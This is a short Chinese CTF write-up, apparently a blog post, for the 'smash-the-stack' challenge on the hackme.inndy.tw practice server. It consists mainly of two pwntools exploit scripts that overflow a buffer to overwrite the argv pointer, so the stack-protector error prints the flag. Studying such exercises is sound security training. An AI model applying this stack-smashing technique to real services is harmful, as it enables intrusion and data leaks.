根据提示:stderr!和32C3的readme一样,原理看上篇,这里贴两个exp
#! /usr/bin/env python
# coding=utf-8
from pwn import *
#io = process('./smash-the-stack')
io = remote('hackme.inndy.tw', 7717)
argv_addr = 0xffffcfa4
buf_addr = 0xffffcee8
flag_addr = 0x804a060
payload = 'a' * (argv_addr - buf_addr) + p32(flag_addr)
io.recvuntil('the flag')
io.sendline(payload)
io.interactive()
另外一个:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
io = remote("hackme.inndy.tw", 7717)
flag_addr = 0x804A060
io.recvuntil("the flag\n")
payload = p32(flag_addr) * 0x300
io.sendline(payload)
io.interactive()

本文分享了两个使用Python编写的远程攻击脚本,通过向目标服务器发送精心构造的payload来获取flag。第一个脚本利用argv_addr和buf_addr之间的偏移量计算payload地址,第二个脚本则直接使用flag地址填充payload。
1067

被折叠的 条评论
为什么被折叠?



